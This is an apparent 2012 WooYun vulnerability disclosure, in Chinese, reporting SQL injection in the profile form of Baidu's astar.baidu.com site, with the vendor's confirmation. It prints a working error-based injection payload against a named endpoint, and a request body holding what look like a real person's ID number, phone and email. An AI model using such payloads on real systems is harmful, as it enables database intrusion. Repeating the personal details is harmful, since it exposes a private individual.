漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-07069
漏洞标题:百度之星post注入
相关厂商:百度
漏洞作者: FlyR4nk
提交时间:2012-05-13 20:44
修复时间:2012-06-27 20:45
公开时间:2012-06-27 20:45
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:7
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-05-13: 细节已通知厂商并且等待厂商处理中
2012-05-14: 厂商已经确认,细节仅向厂商公开
2012-05-24: 细节向核心白帽子及相关领域专家公开
2012-06-03: 细节向普通白帽子公开
2012-06-13: 细节向实习白帽子公开
2012-06-27: 细节向公众公开
简要描述:
主页对post上去的数据没有过滤存在,具体是data[address]没有过滤。
详细说明:
用burpsuit等提交post数据如下:
data%5baddress%5d='and(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and'&data%5bauthor%5d=%e7%8e%8b%e6%b3%bd%e9%a2%96&data%5bbirth%5d=19910829&data%5bbiyetime%5d=2013&data%5bemail%5d=wzyalive%40gmail.com&data%5bidcard%5d=510104199108291068&data%5bjianjie%5d=01%2f01%2f1967&data%5blanguage1%5d=c&data%5blanguage2%5d=java&data%5bmobile%5d=15210602973&data%5bschoolid%5d=40054&data%5bsex%5d=%e7%94%b7&data%5bspecialityid%5d=80601&data%5bxueli%5d=%e6%9c%ac%e7%a7%91&data%5bzipcode%5d=100083&dosubmit=1
提交url为POST /index.php?act=profile&mod=cms HTTP/1.1 host:astar.baidu.com
可以得到数据库用户信息
通过逐一变换语句得到想要的信息。不在累述
漏洞证明:
修复方案:
你懂得!
版权声明:转载请注明来源 FlyR4nk@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2012-05-14 15:27
厂商回复:
感谢提交~~
最新状态:
2012-05-14:。。 点的是确认 给了12分 怎么变成忽略了。。。。